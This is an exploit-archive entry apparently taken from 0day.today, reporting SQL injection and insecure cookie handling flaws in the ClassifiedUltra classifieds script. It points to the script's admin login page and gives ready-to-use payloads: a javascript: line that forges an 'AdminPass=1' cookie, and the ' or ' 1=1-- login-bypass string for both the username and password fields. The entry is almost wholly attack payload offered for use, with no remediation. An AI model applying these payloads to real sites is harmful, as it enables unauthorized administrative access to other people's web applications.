ClassifiedUltra SQL inject / insecure cookie handling vulnerabilities

2010-02-10T00:00:00
ID 1337DAY-ID-10824
Type zdt
Reporter JiKo
Modified 2010-02-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
ClassifiedUltra SQL inject / insecure cookie handling vulnerabilities
=====================================================================

[~]-----------|01|
    -{Script}
    name :ClassifiedUltra
    link :http://www.ezonescripts.com/productdemos/ClassifiedUltra/Site_Admin/index.php

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
    User:' or ' 1=1--
    Pass:' or ' 1=1--



#  0day.today [2016-04-20]  #